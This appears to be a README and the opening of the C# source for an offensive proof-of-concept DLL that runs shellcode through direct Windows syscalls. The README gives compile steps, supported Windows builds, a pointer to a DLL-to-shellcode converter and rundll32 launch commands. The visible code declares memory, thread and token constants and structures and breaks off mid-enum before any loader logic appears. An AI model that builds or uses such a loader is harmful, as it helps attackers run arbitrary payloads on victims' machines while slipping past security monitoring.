ExecuteShellcodeWithSyscalls

Execute shellcode with syscalls from C# .dll

Compile with csc.exe (https://github.com/mobdk/compilecs) and insert entrypoint exec. As time writing this support Windows 10 1803/17134 1809/17763 1903/18362 1909/18363, servers can be added.

For finding syscalls identifer goto https://j00ru.vexillium.org/syscalls/nt/64/

This PoC execute calc.exe. I recommend https://github.com/monoxgas/sRDI/blob/master/PowerShell/ConvertTo-Shellcode.ps1 for converting C coded .dll into shellcode, works both with 32/64bit

Execution example:

Ordinal number: rundll32 syscalls.dll,#1

Entrypoint exec: rundll32 syscalls.dll,exec

syscalls.cs:

using System;
using System.Security;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Runtime.ConstrainedExecution;
using System.Management;
using System.Security.Principal;
using System.Collections.Generic;
using System.ComponentModel;
using System.Security.Permissions;
using Microsoft.Win32.SafeHandles;
using System.Linq;
using System.Reflection;
using System.Security.AccessControl;
using System.Text;
using System.Threading;




public class Code
{

    public const uint MEM_COMMIT = 0x00001000;
    public const uint MEM_RESERVE = 0x00002000;
    public const uint PAGE_EXECUTE_READWRITE = 0x40;
    public const int FILE_READ_DATA = 0x0001;
    public const int FILE_LIST_DIRECTORY = 0x0001;
    public const int FILE_WRITE_DATA = 0x0002;
    public const int FILE_ADD_FILE = 0x0002;
    public const int FILE_APPEND_DATA = 0x0004;
    public const int FILE_ADD_SUBDIRECTORY = 0x0004;
    public const int FILE_CREATE_PIPE_INSTANCE = 0x0004;
    public const int FILE_READ_EA = 0x0008;
    public const int FILE_WRITE_EA = 0x0010;
    public const int FILE_EXECUTE = 0x0020;
    public const int FILE_TRAVERSE = 0x0020;
    public const int FILE_DELETE_CHILD = 0x0040;
    public const int FILE_READ_ATTRIBUTES = 0x0080;
    public const int FILE_WRITE_ATTRIBUTES = 0x0100;
    public const int FILE_OVERWRITE_IF = 0x00000005;
    public const int FILE_SYNCHRONOUS_IO_NONALERT = 0x00000020;
    public const long READ_CONTROL = 0x00020000;
    public const long SYNCHRONIZE = 0x00100000;
    public const long STANDARD_RIGHTS_WRITE = READ_CONTROL;
    public const long STANDARD_RIGHTS_EXECUTE = READ_CONTROL;
    public const long STANDARD_RIGHTS_ALL = 0x001F0000;
    public const long SPECIFIC_RIGHTS_ALL = 0x0000FFFF;
    public const long FILE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1FF;
    public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
    public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
    public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
    public const UInt32 TOKEN_DUPLICATE = 0x0002;
    public const UInt32 TOKEN_IMPERSONATE = 0x0004;
    public const UInt32 TOKEN_QUERY = 0x0008;
    public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
    public const UInt32 TOKEN_ADJUST_PRIVILEGES = 0x0020;
    public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
    public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
    public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
    public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
    public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID);
    public const UInt32 TOKEN_ALT = (TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY);
    public const UInt32 SE_PRIVILEGE_ENABLED = 0x2;
    public const long FILE_GENERIC_READ = STANDARD_RIGHTS_READ | FILE_READ_DATA | FILE_READ_ATTRIBUTES | FILE_READ_EA | SYNCHRONIZE;
    public const long FILE_GENERIC_WRITE = STANDARD_RIGHTS_WRITE | FILE_WRITE_DATA | FILE_WRITE_ATTRIBUTES | FILE_WRITE_EA | FILE_APPEND_DATA | SYNCHRONIZE;
    public const long FILE_GENERIC_EXECUTE = STANDARD_RIGHTS_EXECUTE | FILE_READ_ATTRIBUTES | FILE_EXECUTE | SYNCHRONIZE;
    public const int FILE_SHARE_READ = 0x00000001;
    public const int FILE_SHARE_WRITE = 0x00000002;
    public const int FILE_SHARE_DELETE = 0x00000004;
    public const int FILE_ATTRIBUTE_READONLY = 0x00000001;
    public const int FILE_ATTRIBUTE_HIDDEN = 0x00000002;
    public const int FILE_ATTRIBUTE_SYSTEM = 0x00000004;
    public const int FILE_ATTRIBUTE_DIRECTORY = 0x00000010;
    public const int FILE_ATTRIBUTE_ARCHIVE = 0x00000020;
    public const int FILE_ATTRIBUTE_DEVICE = 0x00000040;
    public const int FILE_ATTRIBUTE_NORMAL = 0x00000080;
    public const int FILE_ATTRIBUTE_TEMPORARY = 0x00000100;
    public const int FILE_ATTRIBUTE_SPARSE_FILE = 0x00000200;
    public const int FILE_ATTRIBUTE_REPARSE_POINT = 0x00000400;
    public const int FILE_ATTRIBUTE_COMPRESSED = 0x00000800;
    public const int FILE_ATTRIBUTE_OFFLINE = 0x00001000;
    public const int FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x00002000;
    public const int FILE_ATTRIBUTE_ENCRYPTED = 0x00004000;
    public const int FILE_NOTIFY_CHANGE_FILE_NAME = 0x00000001;
    public const int FILE_NOTIFY_CHANGE_DIR_NAME = 0x00000002;
    public const int FILE_NOTIFY_CHANGE_ATTRIBUTES = 0x00000004;
    public const int FILE_NOTIFY_CHANGE_SIZE = 0x00000008;
    public const int FILE_NOTIFY_CHANGE_LAST_WRITE = 0x00000010;
    public const int FILE_NOTIFY_CHANGE_LAST_ACCESS = 0x00000020;
    public const int FILE_NOTIFY_CHANGE_CREATION = 0x00000040;
    public const int FILE_NOTIFY_CHANGE_SECURITY = 0x00000100;
    public const int FILE_ACTION_ADDED = 0x00000001;
    public const int FILE_ACTION_REMOVED = 0x00000002;
    public const int FILE_ACTION_MODIFIED = 0x00000003;
    public const int FILE_ACTION_RENAMED_OLD_NAME = 0x00000004;
    public const int FILE_ACTION_RENAMED_NEW_NAME = 0x00000005;
    public const int MAILSLOT_NO_MESSAGE = -1;
    public const int MAILSLOT_WAIT_FOREVER = -1;
    public const int FILE_CASE_SENSITIVE_SEARCH = 0x00000001;
    public const int FILE_CASE_PRESERVED_NAMES = 0x00000002;
    public const int FILE_UNICODE_ON_DISK = 0x00000004;
    public const int FILE_PERSISTENT_ACLS = 0x00000008;
    public const int FILE_FILE_COMPRESSION = 0x00000010;
    public const int FILE_VOLUME_QUOTAS = 0x00000020;
    public const int FILE_SUPPORTS_SPARSE_FILES = 0x00000040;
    public const int FILE_SUPPORTS_REPARSE_POINTS = 0x00000080;
    public const int FILE_SUPPORTS_REMOTE_STORAGE = 0x00000100;
    public const int FILE_VOLUME_IS_COMPRESSED = 0x00008000;
    public const int FILE_SUPPORTS_OBJECT_IDS = 0x00010000;
    public const int FILE_SUPPORTS_ENCRYPTION = 0x00020000;
    public const int FILE_NAMED_STREAMS = 0x00040000;
    public const int FILE_READ_ONLY_VOLUME = 0x00080000;
    public const int CREATE_ALWAYS = 2;
    public const uint GENERIC_ALL = 0x1FFFFF;
    const int PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007;
    const long PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000;
    const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000;

    [StructLayout(LayoutKind.Sequential, Pack = 4)]
    public struct NtCreateThreadExBuffer
    {
        public int Size;
        public uint Unknown1;
        public uint Unknown2;
        public IntPtr Unknown3;
        public uint Unknown4;
        public uint Unknown5;
        public uint Unknown6;
        public IntPtr Unknown7;
        public uint Unknown8;
    };

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct OSVERSIONINFOEXW
    {
        public int dwOSVersionInfoSize;
        public int dwMajorVersion;
        public int dwMinorVersion;
        public int dwBuildNumber;
        public int dwPlatformId;
        [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
        public string szCSDVersion;
        public UInt16 wServicePackMajor;
        public UInt16 wServicePackMinor;
        public UInt16 wSuiteMask;
        public byte wProductType;
        public byte wReserved;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct LARGE_INTEGER
    {
        public UInt32 LowPart;
        public UInt32 HighPart;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct SYSTEM_INFO
    {
        public uint dwOem;
        public uint dwPageSize;
        public IntPtr lpMinAppAddress;
        public IntPtr lpMaxAppAddress;
        public IntPtr dwActiveProcMask;
        public uint dwNumProcs;
        public uint dwProcType;
        public uint dwAllocGranularity;
        public ushort wProcLevel;
        public ushort wProcRevision;
    }

    [Flags]
    public enum ProcessAccessFlags : uint
    {
        All = 0x001F0FFF,
        Terminate = 0x00000001,
        CreateThread = 0x00000002,
        VirtualMemoryOperation = 0x00000008,
        VirtualMemoryRead = 0x00000010,
        VirtualMemoryWrite = 0x00000020,
        DuplicateHandle = 0x00000040,
        CreateProcess = 0x000000080,
        SetQuota = 0x00000100,
        SetInformation = 0x00000200,
        QueryInformation = 0x00000400,
        QueryLimitedInformation = 0x00001000,
        Synchronize = 0x00100000
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct OBJECT_ATTRIBUTES
    {
        public ulong Length;
        public IntPtr RootDirectory;
        public IntPtr ObjectName;
        public ulong Attributes;
        public IntPtr SecurityDescriptor;
        public IntPtr SecurityQualityOfService;
    }

    public struct CLIENT_ID
    {
        public IntPtr UniqueProcess;
        public IntPtr UniqueThread;
    }

    public enum NTSTATUS : uint
    {
        Success = 0x00000000,
        Wait0 = 0x00000000,
        Wait1 = 0x00000001,
        Wait2 = 0x00000002,
        Wait3 = 0x00000003,
        Wait63 = 0x0000003f,
        Abandoned = 0x00000080,
        AbandonedWait0 = 0x00000080,
        AbandonedWait1 = 0x00000081,
        AbandonedWait2 = 0x00000082,
        AbandonedWait3 = 0x00000083,
        AbandonedWait63 = 0x